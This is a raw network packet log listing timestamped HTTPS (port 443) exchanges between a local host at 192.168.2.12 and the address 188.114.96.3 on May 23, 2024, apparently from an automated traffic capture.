                May 23, 2024 18:26:40.246046066 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.324486971 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.324513912 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.324598074 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.324610949 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.324649096 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.341259003 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.341289997 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.341408968 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.341418028 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.341453075 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.346604109 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.346626043 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.346683979 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.346697092 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.346713066 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.346765041 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.346777916 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.346786976 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.346801043 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.346808910 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.346822977 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.346837044 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.346854925 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.346882105 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.346887112 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.346909046 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.346920967 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.346935034 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.346971989 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.346976995 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.346986055 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.346998930 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.347004890 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.347032070 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.347037077 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.347047091 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.347054005 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.347088099 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.347091913 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.347130060 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.347134113 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.347143888 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.347170115 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.347203016 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.354170084 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.865546942 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.865591049 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.865689039 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.865993023 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.866008043 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.365268946 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.368195057 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.368233919 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.513426065 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.514712095 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.514758110 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.514796019 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.514825106 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.514880896 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.517127991 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.518510103 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.518590927 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.518614054 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.521059036 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.521145105 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.521167040 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.523528099 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.523597956 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.523618937 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.525490046 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.525554895 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.525576115 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.568986893 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.569015026 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.606087923 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.606240034 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.606267929 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.607363939 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.607424021 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.607434034 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.610687017 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.610723972 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.610764980 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.610776901 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.610824108 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.613068104 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.616710901 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.616751909 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.616779089 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.616800070 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.616842985 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.617240906 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.619026899 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.619061947 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.619088888 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.619093895 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.619143009 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.620989084 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.622878075 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.622910023 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.622951984 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.622970104 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.623020887 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.624671936 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.626516104 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.626553059 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.626593113 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.626600981 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.626646996 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.628107071 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.629724979 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.629786968 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.629798889 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.678297997 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.694875002 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.696995974 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.697005987 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.697149038 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.697175026 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.700784922 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.700869083 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.700876951 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.700925112 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.702650070 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.704720020 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.704772949 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.704777956 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.704822063 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.707493067 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.707598925 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.708957911 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.709031105 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.712016106 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.712091923 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.713499069 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.713563919 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.716231108 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.716311932 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.717623949 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.717689991 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.720227957 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.720299006 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.721487045 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.721551895 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.723973989 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.724049091 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.787064075 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.787216902 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.789047003 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.789119005 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.790329933 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.790400028 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.791666985 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.791734934 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.794311047 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.794380903 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.796417952 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.796495914 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.797445059 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.797506094 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.798513889 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.798576117 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.800632000 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.800704956 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.802694082 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.802757978 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.803677082 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.803739071 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.805649996 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.805711031 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.806583881 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.806643963 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.807492971 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.807554960 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.809175014 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.809240103 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.812280893 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.812328100 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.812382936 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.812382936 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.812395096 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.813554049 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.813612938 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.813620090 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.813663960 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.814399004 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.814454079 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.815956116 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.816015005 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.817435026 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.817490101 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.818191051 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.818242073 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.819092989 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.819155931 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.877605915 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.877765894 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.879256964 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.879338980 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.880223036 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.880291939 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.881815910 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.881897926 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.884967089 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.884982109 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.885009050 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.885059118 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.885068893 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.885080099 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.888451099 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.888478994 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.888530970 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.888552904 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.888577938 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.892138004 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.892164946 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.892257929 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.892266989 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.895658016 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.895679951 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.895764112 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.895770073 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.898757935 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.898788929 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.898844957 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.898855925 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.898869038 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.901614904 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.901640892 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.901684999 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.901690960 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.901700020 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.904519081 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.904546022 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.904627085 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.904633045 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.959605932 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.973505974 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.973545074 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.973692894 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.973706007 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.973757982 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.976639986 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.976676941 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.976753950 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.976758957 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.976785898 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.976803064 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.978452921 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.978496075 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.978547096 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.978552103 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:41.978576899 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:41.978595018 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.231498957 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.231530905 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.231599092 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.231616974 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.231657028 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.233761072 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.233781099 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.233843088 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.233851910 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.233892918 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.236262083 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.236279964 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.236351967 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.236356974 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.236399889 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.237982988 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.238002062 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.238042116 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.238046885 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.238075972 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.238099098 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.240358114 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.240376949 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.240447044 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.240453005 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.240499020 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.242846012 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.242861986 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.242911100 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.242916107 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.242939949 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.242955923 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.244529009 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.244548082 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.244594097 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.244602919 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.244621038 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.244642973 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.246104956 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.246125937 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.246164083 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.246167898 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.246197939 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.246216059 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.247971058 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.247989893 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.248070955 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.248079062 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.248120070 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.249691010 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.249710083 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.249768019 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.249772072 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.249813080 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.251449108 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.251468897 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.251511097 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.251516104 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.251554012 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.251571894 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.253271103 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.253288984 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.253357887 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.253362894 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.253405094 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.255072117 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.255115986 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.255178928 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.255183935 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.255223989 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.256043911 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.256062984 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.256104946 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.256108999 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.256145000 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.256171942 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.257771015 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.257790089 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.257828951 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.257833958 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.257864952 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.257882118 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.258954048 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.258979082 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.259011030 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.259016991 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.259042978 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.259056091 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.260695934 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.260715961 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.260771036 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.260775089 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.260786057 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.260814905 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.262083054 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.262118101 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.262160063 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.262166023 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.262180090 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.262223005 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.263415098 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.263423920 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.263479948 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.263484955 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.263524055 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.264934063 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.264964104 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.264997005 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.265001059 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.265036106 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.265069962 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.265810013 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.265827894 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.265887022 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.265892029 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.265932083 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.266874075 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.266892910 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:42.266946077 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:42.266949892 CEST44349721188.114.96.3192.168.2.12
